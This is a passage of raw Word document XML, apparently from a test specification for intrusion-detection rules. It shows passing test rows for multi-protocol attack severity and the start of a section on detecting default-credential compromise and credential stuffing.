            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP active on SSH and HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.22.0.2, {SSH, HTTP}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MULTI_PROTOCOL_ATTACK HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MULTI_PROTOCOL_ATTACK HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP active on SSH, HTTP, Telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.22.0.3, 3 protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MULTI_PROTOCOL_ATTACK CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MULTI_PROTOCOL_ATTACK CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP active on SSH, HTTP, Telnet, MQTT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.22.0.4, 4 protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MULTI_PROTOCOL_ATTACK CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MULTI_PROTOCOL_ATTACK CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9048" w:name="_Toc69048"/>
      <w:r>
        <w:t xml:space="preserve">Default-Credential Compromise and Credential Stuffing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9048"/>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A successful login with a default credential within 15 minutes is CREDENTIAL_COMPROMISE: MEDIUM, or HIGH if the same IP had 3 or more failed logins in the 30 minutes before it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">One password tried with 3 or more different user names from the same IP within 30 minutes is CREDENTIAL_STUFFING (MEDIUM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decision table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">26</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Decision Table for Credential Compromise and Stuffing</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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200"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1200"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BE67570" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
